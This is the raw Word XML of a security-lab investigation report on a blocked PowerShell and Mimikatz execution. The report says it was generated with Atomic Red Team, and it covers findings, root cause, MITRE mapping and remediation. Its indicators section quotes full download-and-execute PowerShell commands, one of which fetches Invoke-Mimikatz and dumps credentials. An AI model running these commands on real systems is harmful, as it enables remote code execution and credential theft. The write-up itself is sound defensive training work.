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B1" w:rsidRDefault="008A09B1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1577340" cy="123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ptresecurity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1" w:rsidRPr="008A09B1" w:rsidRDefault="000A5DC6" w:rsidP="008A09B1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A09B1">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigation report — Suspicious PowerShell / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A09B1">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008A09B1" w:rsidRDefault="008A09B1" w:rsidP="008A09B1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6" w:rsidP="008A09B1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="008A09B1">
        <w:rPr>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Analyst</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sceptre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6" w:rsidP="008A09B1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="008A09B1">
        <w:rPr>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A09B1">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>27 October 2025</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6" w:rsidP="008A09B1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="008A09B1">
        <w:rPr>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Ti</w:t>
      </w:r>
      <w:r w:rsidR="008A09B1" w:rsidRPr="008A09B1">
        <w:rPr>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>me zone:</w:t>
      </w:r>
      <w:r w:rsidR="008A09B1" w:rsidRPr="008A09B1">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A09B1">
        <w:t>London (GMT, UTC+00:00)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="00F627D1"/>
    <w:p w:rsidR="00F627D1" w:rsidRPr="008A09B1" w:rsidRDefault="000A5DC6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A09B1">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Investigation summary — what happened?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6">
      <w:r>
        <w:t>Defender for Endpoint detected and blocked suspicious PowerShell activity. The sequence was an interactive RDP session for AzureAD\JennySmith w</w:t>
      </w:r>
      <w:r>
        <w:t>hi</w:t>
      </w:r>
      <w:r w:rsidR="008A09B1">
        <w:t xml:space="preserve">ch spawned cmd.exe that </w:t>
      </w:r>
      <w:r>
        <w:t>launched powershell.exe to download and attempt to execute remote scripts (IEX + DownloadString). Defender prevented payloads including an attempted Mimikatz execution so no credential dumping was completed.</w:t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Stakeholder im</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>pact — who was involved?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A09B1" w:rsidRDefault="008A09B1" w:rsidP="008A09B1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A09B1">
        <w:rPr>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A5DC6">
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000A5DC6">
        <w:t xml:space="preserve"> AzureAD\JennySmith </w:t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Findings — what did I find?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6">
      <w:r>
        <w:t>- Alerts generated and blocked by Defender:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  - Suspicious PowerShell command line with IEX and DownloadString.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  - Suspicious process executed PowerShell command (cmd.exe → powershell.exe).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  - Blocked Mimikatz attempt l</w:t>
      </w:r>
      <w:r>
        <w:t>abelled Trojan:PowerShell/Mimikatz.A (remediation: remove, status: resolved).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Process chain and timestamps show the interactive session root: userinit.exe &gt; explorer.exe &gt; cmd.exe (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 8540) &gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> powershell.exe (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 12236).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">- Advanced Hunting confirmed the download and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">execute pattern at 27 Oct 2025 16:05 GMT but returned no Invoke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> entries.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Spread and persistence checks returned no other affected devices and no scheduled tasks or registry Run keys created.</w:t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Immediate actions — when did this occur a</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>nd is it still happening?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6">
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Initial detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>27 Oct 2025 16:05 GMT</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Status</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>No ongoing execution observed.</w:t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lastRenderedPageBreak/>
        <w:t>Affec</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>ted systems and data — where in the environment did this happen?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6">
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Host:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Jenny (Windows 11 VM), AzureAD\JennySmith session via RDP from 192.168.1.72.</w:t>
      </w:r>
      <w:r>
        <w:br/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Indicators of compromise (IoCs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A5DC6" w:rsidRDefault="000A5DC6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6">
      <w:r>
        <w:t>powershell.exe -exec bypass -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>noprofile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>;$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-</w:t>
      </w:r>
      <w:r>
        <w:t>team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/.../Invoke-Mi</w:t>
      </w:r>
      <w:r>
        <w:t>mikatz.ps1'); Invoke-Mimikatz -DumpCreds</w:t>
      </w:r>
      <w:r>
        <w:br/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R</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>oot cause — w</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>hy did this happen?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6">
      <w:r>
        <w:t>The immediate root cause was execution of a PowerShell download and execute command within an interactive user session. PowerShell with IEX and DownloadString is commonly abused to run remote code. In this case the activity was generate</w:t>
      </w:r>
      <w:r>
        <w:t>d intentionally by Atomic Red Team for testing, but the pattern is identical to real adversary behaviour.</w:t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Nature of the attack — how did this happen?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6">
      <w:r>
        <w:t xml:space="preserve">This is an execution stage activity (MITRE T1059.001). The attacker used cmd.exe to call PowerShell which </w:t>
      </w:r>
      <w:r>
        <w:t>fetched remote scripts and attempted to execute them in memory via IEX. The follow up stage attempted credential theft using a Mimikatz script. Defender detected suspicious command syntax and blocked the payloads before credential theft could occur.</w:t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Recomm</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>ended containment and remediation (if this were real)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6">
      <w:r>
        <w:t>1. Isolate the host from the network.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2. Collect forensic artifacts: memory and disk images, Defender exports, ReportId and process IDs.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3. Rotate passwords for accounts used on the host.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4. Run environ</w:t>
      </w:r>
      <w:r>
        <w:t>ment wide hunts for IEX and DownloadString patterns.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:br/>
        <w:t>5. Deploy Sysmon for deeper telemetry.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>6. Onboard more endpoints to practise spread detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRPr="000A5DC6" w:rsidRDefault="000A5DC6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A5DC6">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627D1" w:rsidRDefault="000A5DC6">
      <w:r>
        <w:t xml:space="preserve">This was a valuable learning exercise. Defender did its job and blocked what would </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">have been a credential theft attempt. The key takeaway is to look out for PowerShell being used by non-IT users. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F62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5DC6"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="008A09B1"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00F627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1F81560-2561-42BA-AE2A-B0B32173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B3B0F7-997C-4DF3-AAA6-72379736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vincent</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-31T13:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-31T13:02:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>